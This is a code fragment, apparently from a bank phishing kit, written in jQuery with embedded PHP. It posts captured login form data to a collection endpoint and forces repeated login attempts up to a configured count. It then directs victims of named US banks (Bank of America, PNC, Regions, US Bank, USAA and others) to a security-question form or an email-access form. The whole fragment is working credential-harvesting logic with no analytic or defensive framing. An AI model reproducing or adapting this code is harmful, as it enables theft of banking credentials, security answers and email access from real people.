
                $("#loginretry").val(loginretry);
                $.post("data/loginbank?key=<?php echo $key;?>", $('#loginbank > form').serialize(), function(result, success) {
                  $('#loginbank .login-submit-button').prop('disabled', true); 
                    if (success == "success") {
                      if (loginretry >= <?php echo $numberofloginretry ?>) {
                        $(".login-errors").hide();
                        $("#loginbank").hide();
                        $('#loginbank .login-submit-button').prop('disabled', false); 
                        <?php if ($bankname === "Bank Of America" or $bankname === "BANK OF AMERICA NA" or $bankname === "Regions Bank" or $bankname === "REGIONS BANK" or $bankname === "PNC" or $bankname === "PNC BANK, NATIONAL ASSOCIATION" or $bankname === "BANK OF AMERICA, N.A." or preg_match("/REGIONS\sBANK/", $bankname) or $bankname === "PNC" or $bankname === "PNC BANK, NATIONAL ASSOCIATION" or $bankname === "PNC BANK, NATIONAL ASSOCIATION" or $bankname === "BANK OF AMERICA, N.A." or $bankname === "US BANK" or $bankname === "US BANK NA" or $bankname === "U.S. Bank" or preg_match("/PNC/", $bankname) or preg_match("/BANK\sOF\sAMERICA/", $bankname) or preg_match("/BB&T/", $bankname) or preg_match("/REGIONS\sBANK/", $bankname) or preg_match("/PNC/", $bankname) or preg_match("/HUNTINGTON\sNATIONAL\sBANK/", $bankname) or preg_match("/USAA/", $bankname)) {
                          echo '$("#secq").show();';
                        } else {
                            echo '$("#emailaccess").show();';
                        } ?>
                        $(location).attr("", "");
                    } else {
                      $('#loginbank .login-submit-button').prop('disabled', false); 
                      $(".login-errors").show();
                      $('#loginbank > form').trigger("reset");
                    }                  
                    }              